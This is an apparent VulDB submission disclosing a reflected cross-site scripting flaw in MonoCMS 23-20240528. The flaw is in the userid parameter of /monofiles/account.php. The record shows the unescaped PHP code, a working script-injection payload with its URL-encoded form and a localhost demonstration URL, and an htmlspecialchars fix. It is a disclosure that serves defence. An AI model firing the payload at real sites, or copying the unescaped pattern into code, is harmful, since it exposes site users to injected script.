Title | MonoCMS 23-20240528 Improper Neutralization of Alternate XSS Syntax |
---|
Description | [XSS vulnerability] found in MonoCMS 23-20240528 - (/monofiles/account.php)
Affected Project: MonoCMS
Web: Php
Vendor: MonoCMS
Official Website: https://monocms.com/
Version: 23-20240528
Updated: 28 May, 2024
Related Code file: /monofiles/account.php
Injection parameter: userid
Sha1: 9532cda20cf7fa456d6f00ce0fe194767913ba83
Vulnerability Description:
The issue arises because the userid parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization.
This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack.
Vulnerable code:
<input name="hiddenid" type="text" value="<?php if (isset($_GET['userid'])) print $_GET['userid'] ?>" hidden>
Injection Payload Tested:
We set userid to:
"><script>alert('XSS')</script>
URL-encoded, this becomes:
%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
Resulting HTML After Injection:
<input name="hiddenid" type="text" value=""><script>alert('XSS')</script>" hidden>
The injected "></script> closes the value attribute and the input tag, allowing the <script> tag to be inserted into the DOM.
Execution:
When the browser parses this HTML, it executes the <script>alert('XSS')</script> code, resulting in a popup displaying "XSS by secuserx".
Demonstration:
Below is how /monofiles/account.php looks like:
https://i.postimg.cc/dV25sxCv/1.png
Then we can add our payload "><script>alert('XSS by secuserx')</script> :
http://localhost:8080/monofiles/account.php?userid="><script>alert('XSS by secuserx')</script>
https://i.postimg.cc/CKwmzsC8/2.png
After submitting the url with the vulnerable parameter userid and the XSS payload "><script>alert('XSS by secuserx')</script>, XSS is triggered:
https://i.postimg.cc/pdkk85k6/3.png
Recommendation for Preventing XSS:
To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters.
Example:
<input name="hiddenid" type="text" value="<?php if (isset($_GET['userid'])) print htmlspecialchars($_GET['userid'], ENT_QUOTES, 'UTF-8') ?>" hidden>
|
---|
Source | ⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20MonoCMS%2023-20240528%20-%20(account.php).md |
---|
User | secuserx (UID 76735) |
---|
Submission | 10/30/2024 01:22 AM (3 months ago) |
---|
Moderation | 11/06/2024 05:37 PM (8 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 283326 [MonoCMS up to 20240528 Account Information Page /monofiles/account.php userid cross site scripting] |
---|
Points | 20 |
---|